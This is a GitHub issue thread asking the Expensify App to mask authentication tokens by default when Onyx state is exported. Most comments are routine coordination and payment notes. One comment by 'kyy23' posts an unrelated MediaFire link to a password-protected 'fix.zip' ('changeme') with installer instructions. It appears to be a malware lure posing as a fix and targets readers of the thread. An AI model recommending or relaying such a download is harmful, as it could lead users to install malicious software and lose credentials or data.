### ISSUE TITLE
[$250] Always mask auth tokens when exporting Onyx state

### ISSUE THREAD

**Issue by TMisiukiewicz** [Expensify/App#47995]
### Problem

When exporting the Onyx state from the Troubleshoot section, sensitive information such as `authToken` and `encryptedAuthToken` are not masked by default. These tokens remain exposed until the "Mask fragile user data" option is explicitly enabled. This could lead to a security vulnerability, as anyone with access to the exported state file could potentially view or misuse these tokens.

### Solution

To mitigate this risk, it should automatically mask `authToken` and `encryptedAuthToken` regardless of whether the "Mask fragile user data" option is enabled. 
<details><summary>Upwork Automation - Do Not Edit</summary>
    <ul>
        <li>Upwork Job URL: https://www.upwork.com/jobs/~021838166767638673695</li>
        <li>Upwork Job ID: 1838166767638673695</li>
        <li>Last Price Increase: 2024-09-23</li>
    </ul>
</details>

<details><summary>Issue Owner</summary>Current Issue Owner: @</details>

<details><summary>Issue Owner</summary>Current Issue Owner: @muttmuure</details>

**Comment by TMisiukiewicz** [comment]
cc @mountiny

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tJonPope727** [comment]
Hello, TMisiukiewicz
I can mask authToken and encryptedAuthToken automatically. please let me know if you allow me to do it.

**Comment by muttmuure** [comment]
Merged!

**Comment by muttmuure** [comment]
Invited

**Comment by muttmuure** [comment]
Can you share your upwork profile?

**Comment by muttmuure** [comment]
Paid!
